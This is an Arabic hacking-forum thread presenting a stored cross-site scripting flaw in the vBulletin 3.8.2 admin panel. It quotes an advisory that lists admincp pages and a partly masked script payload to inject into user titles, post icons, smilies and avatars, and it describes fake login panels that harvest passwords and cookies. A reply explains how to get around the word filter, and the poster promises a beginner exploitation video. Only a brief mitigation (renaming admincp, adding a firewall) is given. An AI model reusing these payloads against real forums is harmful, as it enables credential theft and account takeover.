ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 13

الموضوع: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

  1. #1
    هكر متميز الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,795

    افتراضي ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    بسم الله الرحمن الرحيم

    الثغرة و انا ادور لقيتها و حبيت اطرحها لعل و عسى انه نستفيد و نقفلها

    الثغره هي .. صورتين وملف هتكس .. ويقوم المهاجم بوضع رابط في اي موضوع ..

    وعند دخول اي شخص يطلع له لوحة مثل الفلتر وعند وضع الباس واليوزر ينرسل إلى ملف التكست او الكوكيز ..كود بلغة HTML:


    يعني الثغره زي Add a new title+Post Icons+post new Smilies



    .. حل الثغره ..

    تغيير مجلد الـ admincp .. ووضع جدار ناري .. ==> حل مؤقت لين ما يفرجها ربي

    و الحمدلله اتوقع الكثير مقفلين ادمن سي بي و مغيرينه يعني ما راح تكون خطيرة

    و ان شاء الله ينزل ترقيع رسمي
    كود بلغة HTML:

    vBulletin 3.8.2 adminCP Cross-Site ScriptingR.I.P DrtRp - We miss you---------------------------------------------Original Post at http://forum.aria-security.com/en/sh...p?p=1179Greetz to Aura & all Aria-Security Mods & MembersThese were all tested on vbulletin 3.8.0 RC2 so other version may be effected.1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>or any other XSS code.2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.******************.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>




    بتمنى الكل استفاد
    والاستغلال للمبتدئين فيديو قريباً





    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  2. #2
    هكر متألق الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    حمودي بدال النجوم في كلمات محذوفة لازم تسوي فراغات بينها
    تحياتي الك

  3. #3
    :: مراقب عام :: الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مبدع وابداع ... الاثنين معاً

    لا اله الا الله محمد رسول الله




  4. #4
    هكر نشيط الصورة الرمزية fouade
    تاريخ التسجيل
    Oct 2012
    الدولة
    المغرب ابو الدنيا
    المشاركات
    162

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مبدع اخي تغرة لها مكانيكية xss

  5. #5
    هكر متميز الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,795

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكور يشباب وشكرا اخي عراق هكر على المعلومة
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  6. #6
    هكر مجتهد
    تاريخ التسجيل
    Nov 2012
    المشاركات
    248

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوور يا غالي

  7. #7
    محظور
    تاريخ التسجيل
    Jan 2012
    الدولة
    الجزائر.فلسطين
    المشاركات
    1,490

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوررررررررررررررررررررر ر

  8. #8
    هكر مجتهد الصورة الرمزية MJNONFIK
    تاريخ التسجيل
    May 2011
    المشاركات
    500

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكوووووووور رائع
    Team Anony.Ha4xploit

    f.b.com/anony.ha4xploit

  9. #9
    هكر مجتهد الصورة الرمزية كاسر المشاعر
    تاريخ التسجيل
    Nov 2012
    المشاركات
    525

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    يسلموووووووووو

  10. #10
    هكر متميز الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,795

    افتراضي رد: ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

    مشكور اخي عالمرور
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. تحميل كتب احتراف استغلال xss من الصفر الى الاحتراف Cross-Site Scripting XSS Attack
    بواسطة Hidden pain في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 0
    آخر مشاركة: 09-18-2012, 09:19 PM
  2. ثغرة في منتديات الفي بي vBulletin 4.0.x
    بواسطة millen!um في المنتدى قسم الثغرات
    مشاركات: 25
    آخر مشاركة: 07-12-2012, 11:22 PM
  3. ثغرة XSS في منتديات vBulletin 3.8.4
    بواسطة hacks في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 07-06-2012, 06:29 AM
  4. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  5. (SQL) SnapProof (cart.php) Cross Site Scripting
    بواسطة هاوي حنانك في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 03-03-2011, 08:12 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •